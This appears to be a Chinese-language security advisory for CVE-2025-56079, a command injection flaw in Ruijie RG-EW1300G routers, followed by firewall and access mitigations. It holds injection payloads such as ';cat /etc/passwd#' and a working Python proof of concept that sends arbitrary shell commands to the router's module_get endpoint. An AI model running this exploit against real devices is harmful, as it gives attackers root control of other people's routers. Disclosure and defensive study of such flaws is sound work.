CVE-2025-56079 - 锐捷RG-EW1300G路由器OS命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-56079

漏洞类型

操作系统命令注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Ruijie RG-EW1300G EW1300G

漏洞概述

CVE-2025-56079是锐捷网络技术有限公司生产的RG-EW1300G系列路由器中存在的一个严重操作系统命令注入漏洞。该漏洞影响V1.00、V2.00和V4.00三个版本。攻击者可以通过向设备的/module_get接口发送精心构造的POST请求，在file参数中注入任意操作系统命令。由于该漏洞允许以设备最高权限执行命令，攻击者可以完全控制受影响设备，执行任意代码、窃取敏感信息、植入后门或将其纳入僵尸网络。漏洞无需高级权限即可利用（低权限账户即可），且无需用户交互，具有极高的实际威胁性。建议受影响用户尽快升级到厂商发布的安全补丁。

技术细节

该漏洞位于路由器的Web管理界面，具体位于/usr/local/lua/dev_sta/networkConnect.lua文件中的module_get功能模块。攻击者通过POST请求向该接口发送恶意构造的参数，利用file参数未对用户输入进行充分过滤和验证的缺陷，将操作系统命令注入到底层系统调用中。由于Lua脚本直接调用os.execute()或类似的系统命令执行函数，且未对特殊字符进行转义或过滤，导致用户输入被当作命令的一部分执行。攻击者可以使用分号、管道符或反引号等Shell元字符来分隔和注入额外命令。由于设备通常以root权限运行Web服务，注入的命令也以root权限执行，攻击者可获得设备的完全控制权。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标设备为Ruijie RG-EW1300G路由器，并确认其版本为V1.00/V2.00/V4.00

STEP 2

步骤2

认证：攻击者使用低权限账户（如普通用户账号）登录Web管理界面

STEP 3

步骤3

构造恶意请求：攻击者构建包含命令注入payload的POST请求，目标URL为/cgi-bin/luci/api/module_get

STEP 4

步骤4

命令注入：file参数中注入如';whoami#'或';cat /etc/passwd#'等命令，利用未过滤的用户输入执行系统命令

STEP 5

步骤5

权限提升：由于Web服务以root权限运行，注入的命令获得最高权限，攻击者实现完全控制

STEP 6

步骤6

持久化：攻击者可植入后门、修改配置或窃取敏感数据，建立长期访问通道

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-56079 PoC - Ruijie RG-EW1300G OS Command Injection
# Target: Ruijie RG-EW1300G EW1300G (V1.00/V2.00/V4.00)

def exploit(target_ip, target_port=80, command='id'):
    """
    Exploit OS Command Injection in Ruijie RG-EW1300G
    
    Args:
        target_ip: Target device IP address
        target_port: Target device port (default: 80)
        command: Command to execute on target
    """
    url = f'http://{target_ip}:{target_port}/cgi-bin/luci/api/module_get'
    
    # Inject command via file parameter
    # Using semicolon to chain commands
    payload = f';{command}#'
    
    data = {
        'file': payload
    }
    
    try:
        response = requests.post(url, data=data, timeout=10)
        print(f'Status Code: {response.status_code}')
        print(f'Response:\n{response.text}')
        return response
    except requests.exceptions.RequestException as e:
        print(f'Error: {e}')
        return None

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f'Usage: python {sys.argv[0]} <target_ip> [command]')
        print(f'Example: python {sys.argv[0]} 192.168.1.1 "id"')
        sys.exit(1)
    
    target = sys.argv[1]
    cmd = sys.argv[2] if len(sys.argv) > 2 else 'id'
    exploit(target, 80, cmd)

影响范围

Ruijie RG-EW1300G EW1300G V1.00

Ruijie RG-EW1300G EW1300G V2.00

Ruijie RG-EW1300G EW1300G V4.00

防御指南

临时缓解措施

在厂商发布正式补丁前，建议采取以下临时缓解措施：1) 将路由器管理界面从公网访问限制为仅内网访问；2) 使用VPN或跳板机进行远程管理；3) 禁用不必要的CGI接口；4) 在上游防火墙/路由器上实施访问控制策略，限制对管理端口的访问；5) 监控设备日志，关注异常的POST请求和命令执行行为；6) 考虑部署Web应用防火墙（WAF）过滤恶意请求；7) 定期检查设备配置和运行状态，及时发现异常。